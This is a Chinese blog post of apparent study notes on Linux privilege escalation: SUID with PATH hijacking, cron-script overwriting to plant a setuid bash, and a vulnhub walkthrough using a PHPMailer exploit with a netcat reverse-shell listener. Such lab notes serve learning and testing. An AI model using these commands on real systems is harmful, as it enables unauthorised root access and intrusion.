首页 > 数据库 >8.4linux定时任务-环境变量-数据库

8.4linux定时任务-环境变量-数据库

时间:2024-08-31 10:47:30浏览次数:12  
标签:tmp 8.4 chmod 提权 sh linux 权限 环境变量

配合SUID本地环境变量提权

思路原理:利用sh环境变量替换,使得/tmp/ps得到root权限;ps=sh
过程:手写调用文件-编译-复制文件-增加环境变量-执行

gcc demon1.c -o shell
cp /bin/sh /tmp/ps
export PATH=/tmp:$PATH # webshell权限无法设置环境变量
./shell
id

提前本地定时任务(crontab)安全

1、路径问题-利用计划任务指向文件相对路径解析问题

cat /ect/crontab
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/lcn/test.sh
chmod +x /home/lcn/test.sh
/tmp/bash

2、利用通配符配合命令参数自定义命令实习提权

原理:解压命令同时可以执行命令;

3、权限问题-利用不安全的权限分配操作导致定时任务覆盖;

chmod 777 775等 普通用户通过修改计划任务覆盖其达到命令执行效果;

添加权限 chmod +x test.sh;不正确操作为chmod 777 test.sh;

提前可通过ls -al查看所有文件权限;

linux提权数据-mysql-UDF-vulnhub靶场

1、nmap进行内网探测 nmap 192.168.127.0/24

2、全端口扫描;nmap -p1-65535 192.168.127.141

3、服务探测

4、webpath目录扫描(dirbuster),cms模块调用getshell

http://192.168.127.142/manual/

http://192.168.127.142/vendor/

5、搜索exp,getshell

PHPMailerAutoload.php

/var/www/html/vendor/
flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}。。。
version;
5.2.16
配置文件历史漏洞;

searchsploit phpmailer 搜索历史漏洞信息kali;

复制当前目录cp /usr/share/exploitdb/exploits/php/webapps/40974.py ./

2、exploit-db中下载exp

修改exp vim 40974.py ,分别为上传地址,木马路径和木马上传路径;还有反弹shell地址;

启动脚本 python3 40974.py ,监听端口nc -lvvp 4444

后续参考查找mysql账密进行udf提权;

linux提权总结

1、提权环境-信息收集(SUID,定时任务,可能漏洞,第三方服务等)

2、最新相关漏洞要明确,二次开发相关脚本(shell编程)

3、本地msf-searchexploit脚本远程exploitdb站点搜索说明

4、其他提权方法如:密码复用、guid、sudo等

标签:tmp,8.4,chmod,提权,sh,linux,权限,环境变量
From: https://www.cnblogs.com/lusang/p/18389973

相关文章

  • linux磁盘已满,查看哪个文件占用多
    使用df-h查看磁盘空间占用情况FilesystemSizeUsedAvailUse%Mountedonudev3.9G03.9G0%/devtmpfs799M3.1M796M1%/run/dev/vda199G99G0G100%/tmpfs3.9G03.9G0%/dev/shmtmpfs......
  • Linux-vim
    文章目录vi和vimvim的基本概念vim的基本操作vim正常模式命令集插入模式从插入模式切换为命令模式移动光标删除文字复制替换撤销上一次操作更改跳至指定的行vim末行模式命令集列出行号跳到文件中的某一行查找字符保存文件推出vimvi和vimvi/vim的区别简单点来说,它们......
  • IO进程练习:请在linux 利用c语言编程实现两个线程按照顺序依次输出”ABABABAB......“
    例如:a线程输出”A”之后b线程输出”B”,然后a线程输出“A”,再b线程输出”B”,之后往复循环。【1】使用信号量实现代码展示:#include<stdio.h>#include<pthread.h>#include<string.h>#include<semaphore.h>#include<unistd.h>//定义两个全局信号量,实现同步机制se......
  • linux下基本指令(持续更新)
    目录1.adduser 2.passwd3.userdel4.su-5.ls 6.pwd​编辑7.cd8.touch9.mkdir ......
  • Linux之Prometheus
    认识普罗米修斯1、prometheus介绍        Prometheus(普罗米修斯)是一套开源的监控&报警&时间序列数据库的组合,由go语言开发。适合监控容器平台,因为kubernetes(俗称k8s)的流行带动了prometheus的发展。        PS:文档使用prometheus监控物理服务器。......
  • 【Shell脚本】查看Linux网卡实时流量
    原创唐哥成长的小学生在Linux操作系统中,查询网卡流量并不是特别方便,而且统计方式也不直观,下面给大家整理了一个脚本,直接复制到服务器上运行即可,不存在什么依赖关系。脚本内容将内容保存到一个文件中,文件名称可以自定义,比如:vicatnet.sh将以下内容保存到脚本中#!/bin/......
  • Linux 数据结构 树知识
                                                                                    树:只有一个前驱,但......
  • 一个linux服务器安装多个java版本,如何选择指定的 java版本去执行
    linux中有时候可能你由于不同的项目需要使用不同版本的javajdk部署,你就需要在你的linux服务中安装很多个版本的javajdk,那么在linux中如何安装和使用不同版本的javajdk呢?1.安装第一个javajdk版本:到java官网下载一个javajdk版本,并解压,然后配置环境变量。javajdk地址:wge......
  • python的py文件 如何在window和linux系统中 使用命令的方式执行 接收json参数 两者的
    1.在Python中,可以使用内置的sys模块来在Windows和Linux系统中接收命令行参数。使用sys.argv,它是一个列表,包含命令行参数。sys.argv[0]是脚本名,其余元素是命令行参数。示例代码:importsys#检查参数个数iflen(sys.argv)<2:print("请提供至少一个参数。")sys.......
  • 【Linux】Linux系统性能调优技巧
    目录一、Linux系统性能指标二、Linux系统性能调优技巧2.1 保持系统更新2.2磁盘I/O性能优化2.3内存管理调整2.4关闭不必要的服务2.5进程资源限制2.6网络性能调整2.7监控和分析工具        2.8编译器优化2.9预读取和写入缓存2.10内核参数调整2.11......